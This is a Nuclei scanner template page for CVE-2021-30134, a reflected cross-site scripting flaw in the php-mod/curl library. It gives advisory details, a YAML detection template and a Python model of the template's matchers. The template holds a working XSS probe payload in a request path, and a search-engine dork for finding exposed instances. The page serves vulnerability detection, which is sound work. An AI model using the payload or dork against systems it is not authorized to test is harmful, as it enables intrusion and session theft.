Php-mod/curl Library <2.3.2 - Cross-Site Scripting
ID: CVE-2021-30134
Severity: medium
Author: theamanrawat
Tags: cve2021,cve,xss,php-mod,wpscan,php_curl_class_project
Description
Php-mod/curl library before 2.3.2 contains a cross-site scripting vulnerability via the post_file_path_upload.php key parameter and the POST data to post_multidimensional.php. An attacker can inject arbitrary script, which can allow theft of cookie-based authentication credentials and launch of other attacks.
YAML Source
id: CVE-2021-30134

info:
  name: Php-mod/curl Library <2.3.2 - Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    Php-mod/curl library before 2.3.2 contains a cross-site scripting vulnerability via the post_file_path_upload.php key parameter and the POST data to post_multidimensional.php. An attacker can inject arbitrary script, which can allow theft of cookie-based authentication credentials and launch of other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Upgrade to Php-mod/curl Library version 2.3.2 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/0b547728-27d2-402e-ae17-90d539344ec7
    - https://nvd.nist.gov/vuln/detail/CVE-2021-30134
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-30134
    cwe-id: CWE-79
    epss-score: 0.00099
    epss-percentile: 0.41025
    cpe: cpe:2.3:a:php_curl_class_project:php_curl_class:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: php_curl_class_project
    product: php_curl_class
    google-query: inurl:"/php-curl-test/post_file_path_upload.php"
  tags: cve2021,cve,xss,php-mod,wpscan,php_curl_class_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php?key=<img%20src%20onerror%3dalert(document.domain)>"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'key":"<img src onerror=alert(document.domain)>"'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a26337882a5e9eec245de19d5aa8bed12528870a203d92dbf6c145f983470d79022100fbcc74422e36ff6b2308984f79808f5c497fef383201c66f1f489d63d0b5253b:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-30134.yaml"
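
The template's three matchers and its `matchers-condition: and`, modelled in Python as an added example (not part of the template or of Nuclei itself) to show why a hit requires the unencoded value, a `text/html` response header, and status 200 together. The `Response` class, the JSON body shape, and the header values are constructed assumptions; only the matcher word is copied from the template.

```python
from dataclasses import dataclass

# Word from the template's body matcher, copied verbatim.
BODY_WORD = 'key":"<img src onerror=alert(document.domain)>"'

@dataclass
class Response:
    status: int
    headers: dict
    body: str

def evaluate(resp: Response) -> dict:
    """Simplified model of the template's matchers (case-sensitive substring checks)."""
    header_text = "\n".join(f"{k}: {v}" for k, v in resp.headers.items())
    checks = {
        "body_word": BODY_WORD in resp.body,         # type: word (body)
        "html_header": "text/html" in header_text,   # type: word, part: header
        "status_200": resp.status == 200,            # type: status
    }
    # matchers-condition: and -> every matcher must succeed
    checks["match"] = all(checks.values())
    return checks

# Constructed responses; the JSON shape and header values are assumptions.
RAW = '{"key":"<img src onerror=alert(document.domain)>"}'
SAMPLES = {
    "reflected_as_html": Response(200, {"Content-Type": "text/html; charset=UTF-8"}, RAW),
    "reflected_as_json": Response(200, {"Content-Type": "application/json"}, RAW),
    "html_encoded": Response(200, {"Content-Type": "text/html; charset=UTF-8"},
                             '{"key":"&lt;img src onerror=alert(document.domain)&gt;"}'),
    "not_deployed": Response(404, {"Content-Type": "text/html"}, "Not Found"),
}

def failed_matchers(resp: Response) -> list:
    """Names of the matchers that did not fire, useful when triaging a non-hit."""
    return [k for k, ok in evaluate(resp).items() if k != "match" and not ok]

if __name__ == "__main__":
    for name, resp in SAMPLES.items():
        print(name, evaluate(resp)["match"], failed_matchers(resp))
```

Only the first sample satisfies all three matchers; the JSON-typed and HTML-encoded responses are the cases the header and body matchers exist to rule out.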